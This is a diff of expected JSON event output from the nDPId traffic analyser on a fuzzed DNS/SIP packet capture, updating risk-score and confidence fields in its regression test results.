-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":25197,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":25197,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470141614,"flow_last_seen":1120470150621,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00553{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572981,"flow_last_seen":1120470268180,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":9723,"flow_avg_l4_payload_len":360,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572981,"flow_last_seen":1120470268180,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":9723,"flow_avg_l4_payload_len":360,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00588{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1120470344560,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470344560,"pkt":"ADBUADRWAODtAW69CABFAABEavQAAIARTEHAqAECwKgBAQrVADUAMLAHdOoEAAABAAAAAAAAATEBMAEwAzEyNwdpTC1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.il-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.il-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"ts_msec":1120470344562,"pkt":"AODtAW69ADBUADRWCABFAABbAACGAEARtz7AqAEBwKgBAgA1CtUAR5KDdOKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00761{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00878{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1120470356585,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470356585,"pkt":"ADBUADRWAODtAW69CABFAABIavkAAIARTFjAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcANzaXBpY3liZXJjaXR5AmJrAAAhAAE="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1120470357579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470357579,"pkt":"ADBUADRWAODtAW69CABFAABIavoAAIARTFfAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470356585,"flow_last_seen":1120470357579,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470357579,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470356585,"flow_last_seen":1120470357579,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470357579,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1120470359581,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470359581,"pkt":"ADBUADTdAODtAW69CABFSQBIavMAAIARTFbAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcAxzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470356585,"flow_last_seen":1120470359581,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470359581,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470356585,"flow_last_seen":1120470359581,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470359581,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1120470361584,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470361584,"pkt":"ADBUAEtWAODtAW69CABFAABIavwAAIARTFXAqAkCwKgBAQrWADUANFcM2uIBAAAAAAAAJXMABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
